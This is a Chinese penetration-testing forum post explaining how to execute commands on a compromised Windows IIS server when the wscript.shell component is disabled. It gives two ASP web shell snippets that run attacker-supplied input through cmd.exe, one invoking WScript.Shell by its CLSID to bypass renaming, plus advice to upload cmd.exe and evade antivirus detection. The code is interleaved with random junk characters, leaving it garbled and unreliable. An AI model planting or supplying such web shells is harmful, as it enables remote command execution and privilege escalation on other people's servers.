找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 没有wscript.shell组件提权方法
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2613|回复: 0
打印 上一主题 下一主题

没有wscript.shell组件提权方法

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-10-21 09:08:27 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  • 可能有很多人,看到关闭了wscript.shell,就感觉没提权的希望了。就会放弃。
    , R' y2 X) f  z% `
  • 一般当闭上面组件时,你上传cmd.exe到上面去是运行不了命令的。运行时会说出错。
    3 F1 k) b: X* r# f' h1 Y
  • 要想让运行命令可以试试这种方法,成功率为五五之数。
    " e" _' J4 Q1 B' a3 Z  M% P
  • 把下面代码复制:& f& Z3 t( l. Y/ y
  • <%
    - X8 _' s( m$ C6 g
  • end if' _) C3 ~  |" v2 J$ R1 o; ]8 k
  • response.write(”")% C/ m! p. [; V( Q0 W$ J  M3 M
  • On Error Resume ! ?2 N1 a) `7 m# d% M# P
  • Next
    0 ~3 n' T% `7 O- S
  • response.write oScriptlhn.exec(”cmd.exe /c” & % g! {$ P5 P' [$ X: ^
  • request(”c”)).stdout.readall! E* ~0 E; k1 G
  • response.write(”")' d; O- n. a1 v
  • response.write(”")" A3 W2 j8 o6 K$ {+ @" v
  • response.write(”/ ^' [% z9 a/ u! [  D
  • “)$ U: e7 E* ?8 V8 ]; {7 G" y
  • response.write(”")
    0 C1 @7 L2 r* M) k8 G! P
  • %>7 O* I2 ]+ N. }5 ~( k
  • 保存为一个asp文件,然后传到网站目录上去' h: p$ W- E6 x9 m$ a
  • 运行的时候可能会出现两个问题,第一是运行了为什么运行不了命令,这个你可以试着再上传个cmd.exe然后把路径写入上面代码。
    ; w4 R' F# t2 s& V, h
  • 我用此成功运行过cacls命令。
    ' X: ?* K0 y7 x" R' A) D
  • 第二那就是运行时出错,可能限制某些代码执行, {# ?! G4 F7 K* L) w9 L! j8 }1 C, a
  • 无wscript.shell组件提权又一个方法
    0 u0 t( c7 R- e$ R) |( E% Q/ ?
  • <object runat=server id=oScriptlhn scope=page
    5 j, \. b7 ]# D0 m% }, ]! o% N
  • 2 E$ v6 ~7 E* `6 U! K$ r
  • classid=”clsid:72C24DD5-D70A-438B-8A42-98424B88AFB8″></object>
    9 q5 q1 |: D; f0 G4 w/ q
  • <%if err then%>
    # o3 ]  R" U  V" M/ z
  • <object runat=server id=oScriptlhn scope=page / d! b6 _/ E8 }# y2 f* n7 V
  • ) G6 V  F4 v+ @8 v. F3 J
  • classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”></object>% \& `( d+ J: l
  • <% / K  C- t6 A8 h6 ^1 H/ W
  • end if % C& s+ ]% M! E
  • response.write(”<textarea readonly cols=80
    ; p  ]! T1 ^3 `3 B
  • / {8 t7 L2 C$ G3 B
  • rows=20>”) : K- x4 A1 S, r% X: S0 e/ P
  • On Error Resume Next
    3 m1 K- A3 W: j; t0 V$ E3 T* s
  • response.write 5 [6 `2 O. Z8 P  b# v

  • ( z: I: I. V( i. \8 v1 K
  • oScriptlhn.exec(”cmd.exe /c” & request(”c”)).stdout.readall0 n8 N0 U) V# K
  • response.write(”</textarea>”) - A9 Q$ h4 M- }4 E. m% r
  • response.write(”<form
    " u2 ^' L( Q1 N$ Q3 W/ s6 H# e" g$ e

  •   D1 |( Z0 g# h% i& ]
  • method=’post’>”)
    8 [& L5 O/ N: H/ y3 a* d
  • response.write(”<input type=text name=’c' 0 s3 t& @: D4 k9 m
  • 1 G" b' _6 Q  [% R0 ]: y
  • size=60><br>”) 0 H& k! u1 }# x6 f, Y
  • response.write(”<input type=submit 7 [; v) M  I! T5 C* V( d+ A# g3 O

  • : z4 f% P6 _) C
  • value=’执行’></form>”)
    $ Z4 c! D! j3 K$ M- r% d
  • %>
    4 H; W1 w5 V6 x$ @+ V2 C
  • 保存为ASP,此代码可能被杀,请注意免杀。
    8 R3 N2 O" H4 g! q# X9 }2 n% `
  • 原理:有些人把wscript.shell改名了,但是clsid没有变,所以调用这个clsid就等于调用ws组建
    8 J% l2 G& g( N
复制代码
request, server, 成功率

相关帖子
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表